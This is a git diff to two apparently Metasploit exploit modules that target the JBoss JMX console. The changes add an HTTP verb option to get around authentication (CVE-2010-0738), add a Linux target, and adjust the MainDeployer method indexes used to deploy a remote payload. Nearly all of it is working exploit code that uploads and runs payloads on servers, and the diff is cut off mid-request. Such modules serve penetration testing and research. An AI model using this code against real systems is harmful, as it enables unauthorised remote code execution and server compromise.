diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 0099d75878..2fe91c9fa1 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2006-5750' ], + [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST [ 'OSVDB', '30767'], [ 'BID', '21219' ] ], @@ -57,7 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote Opt::RPORT(8080), OptString.new('SHELL', [ true, "The system shell to use.", '/bin/sh']), OptString.new('URI', [ true, "The URI to call the payload.", '/web-console/']), - OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']) + OptString.new('PATH', [ true, "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']), + OptString.new('VERB', [ true, "The HTTP verb to use", "POST"]), ], self.class) end @@ -68,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_cgi( { 'uri' => '/jmx-console/HtmlAdaptor', - 'method' => 'POST', + 'method' => datastore['VERB'], 'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' + - Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' + - Rex::Text.uri_encode(payload.encoded) + '&arg4=True', + Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' + + Rex::Text.uri_encode(payload.encoded) + '&arg4=True', }) if (res.code == 200) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index bf594df851..ba140054e4 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -34,11 +34,12 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2007-1036' ], + [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST [ 'OSVDB', '33744' ], [ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ] ], 'Privileged' => true, - 'Platform' => [ 'win' ], # linux untested + 'Platform' => [ 'win', 'linux' ], # linux untested 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ @@ -55,6 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Arch' => ARCH_X86, 'Platform' => 'win' }, + ], + [ 'Linux Universal', + { + 'Arch' => ARCH_X86, + 'Platform' => 'linux' + }, ] ], 'DefaultTarget' => 0)) @@ -64,7 +71,8 @@ class Metasploit3 < Msf::Exploit::Remote Opt::RPORT(8080), OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), - OptString.new('PATH', [ true, "The URI path of the console", '/jmx-console']) + OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console']), + OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST']), ], self.class) end @@ -140,15 +148,19 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Path' => resource_uri }}) + print_status("Making the request to the MainDeployer...") res = send_request_cgi({ - 'method' => 'POST', + 'method' => datastore['VERB'], 'uri' => datastore['PATH'] + '/HtmlAdaptor', 'vars_post' => { 'action' => 'invokeOp', 'name' => 'jboss.system:service=MainDeployer', - 'methodIndex' => '21', # deploy via java.net.URL + # deploy via java.net.URL + 'methodIndex' => '3', # jboss 4.0.5 + #'methodIndex' => '21', # jboss 3.0.8 + #'methodIndex' => '23', # jboss 3.2.7 'arg0' => service_url } }, 20) @@ -199,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote # print_status("Undeploying #{app_base} ...") res = send_request_cgi({ - 'method' => 'POST', + 'method' => datastore['VERB'], 'uri' => datastore['PATH'] + '/HtmlAdaptor', 'vars_post' => {